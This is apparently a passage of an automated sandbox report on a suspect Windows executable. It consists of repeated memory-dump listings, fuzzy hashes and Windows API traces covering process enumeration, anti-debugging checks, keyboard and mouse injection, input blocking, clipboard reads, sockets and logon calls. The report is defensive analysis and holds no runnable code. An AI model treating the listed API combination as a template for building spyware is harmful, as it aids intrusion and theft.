                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                    • String ID:
                                                    • API String ID: 540024437-0
                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                    • API String ID: 0-2872873767
                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscat.LIBCMT ref: 00475657
                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 2547909840-0
                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                    • String ID: *.*$\VH
                                                    • API String ID: 2786137511-2657498754
                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: pqI
                                                    • API String ID: 2579439406-2459173057
                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                    APIs
                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicollmouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 1033544147-711622031
                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: KeyboardMessagePostState$InputSend
                                                    • String ID:
                                                    • API String ID: 3031425849-0
                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                    • IsIconic.USER32 ref: 0047A393
                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                    • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 6657a256bd3447127bf08af48fffe896882875dcfe48375d14e679f7c7ae9787
                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                    • Opcode Fuzzy Hash: 6657a256bd3447127bf08af48fffe896882875dcfe48375d14e679f7c7ae9787
                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                    • String ID:
                                                    • API String ID: 901099227-0
                                                    • Opcode ID: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                    • Opcode Fuzzy Hash: 97c0115689459c5170db59d582b95bf639c465a717fdad7c54a0526a5dec2c32
                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                    APIs
                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Proc
                                                    • String ID:
                                                    • API String ID: 2346855178-0
                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
